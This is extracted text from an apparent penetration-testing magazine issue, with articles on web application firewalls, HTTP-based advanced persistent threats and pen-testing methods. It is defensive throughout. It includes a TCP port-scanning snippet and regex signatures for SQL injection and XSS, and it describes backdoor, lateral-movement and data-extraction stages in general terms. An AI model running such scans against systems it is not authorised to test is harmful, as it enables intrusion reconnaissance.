A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communication at the application level. Normally, the web application to be protected does not have to be changed.

Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.

After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused by SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.

In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in a different, predefined way. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid number of characters and the permitted value range.
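The parameter rules described above can be sketched as a small whitelist check (the rule format and function names are hypothetical, not taken from any particular WAF product): a request is rejected when it carries unknown parameters, too many of them, or values that are too long or outside the permitted character set:

```javascript
// Per-form parameter rules: expected count, maximum length, allowed characters.
const rules = {
  '/login': {
    maxParams: 2,
    params: {
      user: { maxLength: 32, pattern: /^[A-Za-z0-9_]+$/ },
      pass: { maxLength: 64, pattern: /^[\x20-\x7e]+$/ },
    },
  },
};

function requestAllowed(path, query) {
  const rule = rules[path];
  if (!rule) return false; // default deny for unmonitored forms
  const names = Object.keys(query);
  if (names.length > rule.maxParams) return false;
  return names.every((name) => {
    const p = rule.params[name];
    return Boolean(p)
      && query[name].length <= p.maxLength
      && p.pattern.test(query[name]);
  });
}
```

Note how a classic SQL Injection probe fails the character-set rule without the WAF needing to understand SQL at all, which is exactly the strength and the limitation of such generic parameter rules.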
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.

To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.

The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.

Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scanning attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But Proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:

• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.

Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or their use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.

In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Page 4 httppentestmagcom012011 (1) November Page 5 httppentestmagcom012011 (1) November
TEAM
Editor: Katarzyna Zwierowicz katarzyna.zwierowicz@software.com.pl
Betatesters: Jeff Weaver, Daniel Wood, Edward Wierzyn, Davide Quarta
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Marketing Director: Ewa Dudzic ewa.dudzic@software.com.pl
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trademarks presented in the magazine were used only for informative purposes.
All rights to trademarks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by
Mathematical formulas created by Design Science MathType™.
DISCLAIMER: The techniques described in our articles may only be used in private local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
in Ruby by Tasos "Zapotek" Laskos. Step by step, the author acquaints us with the process of installing and using the program, and also clearly shows us the advantages and disadvantages of Arachni.
XSS, BeEF and Metasploit Exploitation
by Arvind Doraiswamy
Cross Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code. In this article, Arvind Doraiswamy shows us how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF.
Cross-site Request Forgery: In-depth Analysis
by Samvel Gevorgyan
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users. Samvel Gevorgyan describes step by step how to deal with the CSRF vulnerability.
WEB APPS CHECKING
First the Security Gate, then the Airplane
by Oliver Wai
Oliver Wai tries to answer the question: "What needs to be heeded when checking web applications?" Any web application, old or new, needs to be secured by a Web Application Firewall (WAF) in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
ADVANCED PERSISTENT THREATS
The omnipresence of the Web is now a given, and it serves a wide variety of situations, as detailed in the non-exhaustive list below:

• Community applications
• Institutional Web sites
• Online transactions
• Business applications
• Intranet/Extranet
• Entertainment
• Medical data
• Etc.

In response to user requirements and developing needs, content driven by HTTP has become increasingly rich and dynamic. It even goes as far as incorporating script languages that transform the Web browser into a universal enhanced client that espouses different platforms. PC, Mac and Mobile users all form part of the connected masses operating on their chosen platforms. But have these new privileges arrived without any underlying constraints?
The race towards sophistication has not been accompanied by similar developments in respect of the security and reliability of data circulated across the Web. A concrete example is the fact that HTTP does not provide native support for sessions, and it is therefore difficult to be sure that requests received during browsing emanate from the same user. Large-scale use of the Web illustrates the discrepancy that exists in terms of security versus volume, and this inherent flaw has become a major IT system issue, making HTTP a preferred vector of attacks and data compromise.
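Because the protocol itself is stateless, applications have to layer their own session handling on top of it, typically with cookies. The sketch below is a minimal Python illustration (the key and the function names are hypothetical, not from the article) of a server signing a session cookie with an HMAC so that a returned cookie can be tied back to a user without trusting the client:

```python
import hashlib
import hmac

SECRET = b"replace-with-a-random-server-side-key"  # hypothetical server-side key

def make_session_cookie(user):
    """Issue a session token the server can later verify without storing state."""
    sig = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return "%s.%s" % (user, sig)

def verify_session_cookie(cookie):
    """Return the user name if the cookie is authentic, None if it was tampered with."""
    user, _, sig = cookie.rpartition(".")
    expected = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return user if hmac.compare_digest(sig, expected) else None
```

A real application would also add expiry and randomness to the token; the point here is only that session continuity is something the application must build itself, since HTTP does not provide it.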
Cybercriminals are aware of the exploitability of the Web and have made it their number one target. Not a week goes by without an organization being compromised via HTTP:

• PlayStation Network (Sony) → WordPress version problem
• MySQL (Oracle) → SQL Injection
• RSA (EMC) → SQL Injection
• TJX → SQL Injection

The above attacks, conceived and carried out with precise attention to logistics, are by no means an innovation, but we now refer to them differently, using the term APT: Advanced Persistent Threat.
Bolstered cyber-activity, the discovery of intrusions and updated legislation entailing mandatory declaration of incidents collectively lead to extensive media coverage, which in turn amplifies the impact on the image of the unfortunate victims, more often than not high-profile businesses or international organizations.
The Significance Of HTTP And The Web For Advanced Persistent Threats
Initially created in 1989 by Tim Berners-Lee at CERN, the Hypertext Transfer Protocol (HTTP) was actually launched one year later and continues to use specifications that date to 1999 – a mere time lapse of twenty-two years in the transmission of Web-based content.
Anatomy of an APT
Advanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose: that of retrieving sensitive or critical data. Several steps are necessary to reach the goal:

• The initial intrusion
• Continued presence within the IT system
• Bounce mechanisms and in-depth infiltration
• Data extraction

HTTP plays an important role during the attacks, firstly because it is predominantly present during the various stages, and furthermore because it is often the only available protocol that can serve as an attack vector.

The Initial Intrusion
The system is invaded by an attack focused on an area exposed to the public on the Internet. In the case of the Sony PlayStation Network, for instance, the intrusion took place via their blog, which used a vulnerable version of WordPress. These days it is unusual for any organization to do without a website, and the latter can range from basic and simple to complex and dynamic.
The website plays the role of a gateway that provides the initial point of entry into an infrastructure. It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack. In addition, depending on the application infrastructure, its location and a lack of compartmentalization, it is possible for a simple, scarcely-used application to be found near or on the same server as a business application. The attack will bounce from the one to the other, and the business application will then become accessible and provide more access privileges.
Retrieval of information is often the vital issue during the bounce mechanism and extended infiltration into the system. Some examples of the data targeted:

• User passwords
• Hardware and network destinations → discovery
• Connectors to other systems → new protocols
• Etc.

Continued Presence
After the initial inroads into the structure, the next phase requires that presence within the system remains secure. The machine has to be re-accessed and exploited without arousing the suspicions of system administrators. The use of HTTP may be required because different areas are often filtered, leaving only necessary protocols open, and HTTP is often left open to allow administrators to navigate through these machines or to update them.
To remain as stealthy as possible, a strategic backdoor to the web application or the application server will use HTTP as a direct connection and/or as a tunnel to other applications. During its movement it will not be filtered, and no attention will be drawn to a process that opens a port unknown to the system.

Bounce Mechanisms
Whenever changes occur within an IT system, the steps involving initial intrusion and continued presence are repeated as many times as necessary until the goal is attained and sensitive data becomes accessible. HTTP once again comes into play during these stages because it is predominantly active and open between the different areas:

• Dialogue between server applications
• Web services
• Web administration interfaces
• Etc.

It often happens that security policies contain the same weaknesses from one area to another:

• Exit ports opened
• Filtering omissions on higher-level ports
• Use of the same default passwords

Data Extraction
Once crucial information is reached, it is necessary to quit the system as discreetly as possible and over a certain length of time. The HTTP protocol is often enabled for exit without being monitored, for several reasons:

• Machines are often updated using HTTP
• When an administrator logs on to a remote machine, he will often require access to a website
• Since these areas are often regarded as "safe" zones, restrictions are lower and controls less strict

What Protective Measures Can Be Deployed?
Application security has become a major issue in the business world. Whereas network security is fairly conventional and primarily leans on the filtering of destinations, sources, IPs and ports, in most cases application security is more complex and involves applications that are often unique, bespoke, and deployed with many more specifications relating to infrastructure. Three steps are necessary to prevent or respond properly to an APT:
• Prevention
• Response
• Forensics
Prevention
Ideally, security should be addressed at the very beginning, when the software and even the application infrastructure are still at the conception stage. It is necessary to follow certain rules which will condition the response to different threats.
Define a Secure Application Infrastructure
Partition the Network
This measure is one of the pillars of PCI-DSS, and for good reason. Keeping sections separate can limit the impact of an intrusion, making it more difficult to obtain satisfaction because of the large number of bounces required to reach sensitive data. Each zone also deploys a security policy adapted to its content, whether the flow is inbound or outbound.
Moreover, partitioning allows for easier forensic analysis in case of a compromise. It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately. Unfortunately, there are many systems, described as flat infrastructures, that contain a variety of applications housed in the same area. After an incident has occurred, it is difficult to determine precisely which applications have been compromised and what data has been hijacked.
Separation of Applications
Applications can be separated using criteria such as data categorization or the level of risk attached to the application. Clustering provides numerous advantages:

• It promotes rationalization in the design of security policies, which are more or less complex depending on the type of data and the structure of the application to secure.
• It enhances understanding of an attack and, by doing so, facilitates the search for evidence, which will then be based on the criticality of data and the complexity of applications.
Anticipate Possible Outcomes
To better understand the scope of an attack, it is necessary to anticipate the options available to a hacker once an application has been compromised. Once this is done, it is necessary to anticipate the procedures required to analyze, verify and understand the attack. We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident. In such a case, it is necessary to predefine the tools and procedures for investigations and/or monitoring.
Risk Analysis and Attack Guidelines
This step allows a precise understanding of risks based on the data manipulated by applications. It has to be carried out by studying the web applications, their operation and their business logic. Once each data component has been identified, it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure.
Developer Training
Applications are commonly developed following specific business imperatives, and often with the added stress of meeting availability deadlines. Developers do not place security high on their list of priorities, and it is often overlooked in the process.
However, there are several ways to significantly reduce risk:

• Raising developer awareness of application attacks:
  • OWASP Top 10
  • WASC TC v2
• The use of libraries to filter input (libraries are available for all languages)
• Setting up audit functions, logs and traceability
• Accurate analysis of how the application works
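As a concrete illustration of the input-filtering point above, here is a minimal Python sketch (the function names and the allow-list pattern are illustrative assumptions, not from the article) combining an allow-list check on input with output encoding:

```python
import html
import re

# Allow-list pattern for a username field (an assumption for this example)
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def clean_username(value):
    """Reject anything outside the allow-list instead of trying to strip bad characters."""
    if not USERNAME_RE.match(value):
        raise ValueError("invalid username")
    return value

def render_comment(text):
    """Encode output so user-supplied text cannot become markup (XSS defence)."""
    return "<p>%s</p>" % html.escape(text)
```

The design choice worth noting is deny-by-default: validation rejects unexpected input outright, while encoding neutralizes whatever must be echoed back.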
Regular Auditing: Code Analysis
You can resort to manual code analysis by an auditor, or to automated analysis using the tools available to find vulnerabilities in the source code of web applications. These tools often require complex configuration. This step is useful for detecting vulnerabilities before going into production, and thus fixing them before they are exploited.
Unfortunately, the practice is only possible if you have access to the source code of the application; closed-source software packages cannot be analyzed.
Scanning and Penetration Testing
All applications can be scanned and pentested. These tests also require configuration and/or a thorough analysis of the application to determine the credentials necessary for navigation, or the resources to be avoided because of their capacity to cause significant damage (e.g. links enabling the deletion of entries in the database).
These tests have to be reproduced as often as possible, and whenever a change in the application is put in place by developers.
Appropriate Response
Traditional firewalls do not filter application protocols; at best, the so-called next-generation models can recognize a type of protocol and filter content in the manner of an IPS, by recognizing attack patterns. This response is clearly inadequate.
Each zone containing web applications has to be filtered on incoming and outgoing content, and on the use of the protocol itself.
This type of deployment is often called deep defense, and it has the ability to monitor the various attacks at both the application and network levels.
Last but not least, the association of the identity context with the security policy allows better detection of anomalies.
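To see why IPS-style pattern recognition alone is inadequate, consider this deliberately naive signature filter sketched in Python (the signatures are illustrative assumptions); a trivially URL-encoded payload already slips past it:

```python
import re

# Naive IPS-style signatures (illustrative only; easily bypassed by encoding tricks)
SIGNATURES = [
    re.compile(r"(?i)\bunion\b.+\bselect\b"),  # crude SQL injection pattern
    re.compile(r"(?i)<script"),                # crude XSS pattern
]

def looks_malicious(query_string):
    """Return True if any signature matches the raw query string."""
    return any(sig.search(query_string) for sig in SIGNATURES)
```

A protocol-aware filter would first decode and normalize the request the way the application will interpret it, which is exactly what plain pattern matching omits.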
Traffic Filtering: The WAF (Web Application Firewall)
Web application firewalls can be considered an extension of network firewalls to the application layer. They are able to analyze HTTP and the content it conveys. The device is strongly recommended by section 6.6 of PCI-DSS.
Often used in reverse proxy mode, it allows for a break in the protocol and facilitates the restructuring of areas between applications.
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed.
The WAF also helps to monitor and alert in case of a threat, in order to trigger a rapid response (e.g. blocking the IP of the attacker via a dialogue protocol with network firewalls).
Traffic Filtering: The WSF (Web Services Firewall)
The WSF represents an extension of the WAF to the protocols carrying XML traffic over HTTP, such as SOAP or REST.
XML and its standards make security management easier, in the sense that the operation of the service is described by documents generated directly by the development framework (e.g. WSDL, schemas).
Web services are vulnerable to the same attacks as web applications; they consequently need the same kind of protection. Their position in the application infrastructure, however, is much more critical: they are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures.
The WSF provides security on the message format and content, but also on the use of a service. The use or production of a web service entails a contract between two parties on the type of use (e.g. number of messages per day, data types, etc.). The WSF will also serve to monitor this function and to ensure respect of the SLA between the two parties.
Authentication and Authorization
Applications use identities to control access to various resources and functions.
The association of the identity context and security increases efficiency in the detection of anomalies. For example, a whitelist adapted according to the type of user can verify access to information based on the user's role.
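A sketch of such a role-based whitelist might look as follows in Python (the roles and paths are hypothetical examples, not from the article):

```python
# Hypothetical role-to-resource whitelist tying the identity context to filtering
ROLE_WHITELIST = {
    "visitor":  {"/", "/products"},
    "customer": {"/", "/products", "/account", "/orders"},
    "admin":    {"/", "/products", "/account", "/orders", "/admin"},
}

def access_allowed(role, path):
    """Deny by default: a request is an anomaly unless the role's list permits it."""
    return path in ROLE_WHITELIST.get(role, set())
```

A visitor requesting /admin is then not just denied but can be flagged as anomalous behavior worth alerting on.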
Ensuring Continuity of Service
Application security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes.
However, some attacks based on weaknesses can be devastating in effect, perpetrated to make the application unavailable and thereby provoke losses due to activity downtime.
To retaliate, it is necessary to establish protective measures that block denial of service and automated processes, and to ensure load balancing and SSL acceleration.
Operation and Monitoring
It is important to understand the use of the application during production, to monitor and detect abnormal behavior, and to make decisions accordingly:

• Blacklisting
• Legal action
• Redirection to a honeypot
Log Correlation
Understanding abnormal behavior in an application helps in locating an attack. An application infrastructure can comprise hundreds of applications. To understand the attack as a whole and monitor its changes (discovery, aggression, compromise), it is necessary to have a holistic view.
To do this, it is imperative to collect and correlate logs to obtain real-time overall analysis and understand the threat mechanics:

• A mass attack on a type of application
• An attack targeting a specific application
• Attacks focused on a type of data
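A log-correlation pass of the kind described can be sketched in a few lines of Python (the log format, status-code heuristic and threshold are simplifying assumptions for illustration):

```python
from collections import Counter

def correlate(log_lines, threshold=3):
    """Count suspicious hits per (source IP, application) and flag mass patterns."""
    hits = Counter()
    for line in log_lines:
        ip, app, status = line.split()      # simplified "ip app status" format
        if status in {"403", "500"}:        # treat errors as attack indicators
            hits[(ip, app)] += 1
    # Any pair crossing the threshold suggests a focused or mass attack
    return [key for key, count in hits.items() if count >= threshold]
```

In practice the correlation keys would be richer (URL patterns, data types, time windows), but the principle is the same: aggregate across applications to see the attack as a whole.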
Reporting and Alerting
The dialogue between application, network and security teams is often complex within an organization. Formalized reports on attacks and on the use of the application provide these teams with a basis for work and an understanding of application threats.
Alerts will enable them to react and trigger procedures, either at the network level by blocking the IP of the attacker, or at the application level by forbidding access to resources or areas, or more directly by referral to a honeypot with a view to analyzing the behavior of the attacker.
Forensics
Understanding the Scope of an Attack
For each area compromised, it is important to understand what elements have been impacted and to trace the attack back to the roots of the intrusion and compromise: the installation of a backdoor, bounce mechanisms to other areas, and/or extraction of data.
Analysis of Application Components
To understand how the intrusion occurred, it is important to look for abnormal uses. One example could be the presence of anomalous data in a variable or a cookie. To drill down to this level, the logs of the various application components turn out to be very useful:

• Web or application server
• Database
• Directory
• Etc.
Systems Analysis
To understand how the attacker remained in the area, it is important to identify the type of backdoor used. From the simplest act, such as placing an executable file in the application itself, to the injection of code into a process (e.g. hooking network functions), it is necessary to analyze the system hosting the application:

• Changed configuration files
• Users added
• Security rules changed
• Errors of execution or increases in privileges
• Unknown daemons or unusual groups and users
• Etc.
Analysis of Network Equipment
During the various bounces within the application infrastructure, the discovery and exploration of new possibilities leaves fingerprints. Network firewalls keep precious logs with traces of these attempts. In addition, if access is logged, it is important to check whether there are connections to web applications at unusual times.
The End Justifies the Means
In conclusion, we can see that the means used to achieve an APT are often substantial and proportional to the criticality of the targeted data. APTs are not just temporary attacks but real and constant threats with latent effect that need to be fought in the long run.
The security of an application infrastructure begins with the conception process and requires basic rules to be respected in order to simplify security operations.
Real-life experience of application management highlights the difficulties in implementing all of these good practices.
A comprehensive study of threats, appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks.
MATTHIEU ESTRADE
Matthieu Estrade has 14 years of experience in internet security. In 2001, Matthieu designed a pioneering application firewall based on Web Reverse Proxy technology for the company Axiliance. As a well-known specialist in his field, he soon became a member of the Open Source Apache HTTP server development team. His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC. Matthieu is also a member of the French OWASP chapter. Matthieu is currently CTO at BeeWare.
WEB APP SECURITY
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, Cold Fusion and Flash.
These applications expose financial data, customer information and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level for such applications. With the accessibility of such critical data from the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge of and experience with a variety of different tools, and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. input validation, buffer overflow, cross-site scripting, URL manipulation, SQL injection, cookie modification, bypassing authentication and code execution). A typical pen test involves the following procedures:

• Identification of Ports – In this process, ports are scanned and the associated services running on them are identified.
• Software Services Analyzed – In this process, both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real, where a weakness might be exploited to help remediate the issues.
• Remediation of Vulnerabilities – In this process, the vulnerabilities will be resolved, and such vulnerabilities will be re-tested to ensure they have been addressed.
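The port-identification step above can be sketched with a simple TCP connect scan in Python (a minimal illustration; real scanners also fingerprint the services behind the open ports, e.g. by banner grabbing):

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of ports accepting TCP connections on the host."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means the connection succeeded
                open_ports.append(port)
    return open_ports
```

Only scan hosts you are authorized to test; as the magazine's disclaimer notes, such techniques belong in private local networks.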
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, and the severity of any defects that do remain undetected can be reduced or eliminated. Despite the fact that the above initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context, or make normative judgments about them, the struggle to find certain vulnerabilities will exist.
Web Application Security and Penetration Testing
In recent years, web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs. Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols, and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access to these doors (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the required countermeasures are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:

• Automated processes – where scanning tools or static analysis tools are used
• Manual processes – where penetration testing or code review is used

Web application vulnerability types can be grouped into two categories.
Technical Vulnerabilities
Such vulnerabilities can be examined through tests such as cross-site scripting, injection flaws and buffer overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can be used to manipulate the logic of the application into doing tasks it was never intended to do. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow, or how the application works in general. Understanding the logic and the flow of an application allows the manual pen tester to subvert or overthrow the business logic, where security vulnerabilities can be exposed. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation that exists at point B.
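The A-to-B-to-C example can be made concrete with a small simulation: a server that enforces workflow order on its side rejects the jump from A straight to C, while one relying on client-side navigation would not. The class below is a hypothetical sketch, not code from any tested application:

```python
# Minimal simulation of the A -> B -> C workflow described above (hypothetical app)
class Workflow:
    ORDER = ["A", "B", "C"]  # B is the security validation step

    def __init__(self):
        self.completed = []

    def visit(self, step):
        """Server-side enforcement: reject any step whose predecessors are missing."""
        expected = self.ORDER[len(self.completed)]
        if step != expected:
            raise PermissionError("step %s reached without completing %s" % (step, expected))
        self.completed.append(step)
```

A manual tester probes exactly this: request C directly after A and observe whether the application objects.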
History has proven that software bugs, defects and logical flaws are consistently the primary causes of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It has also been proven that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). In such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection against attacks on the web applications.
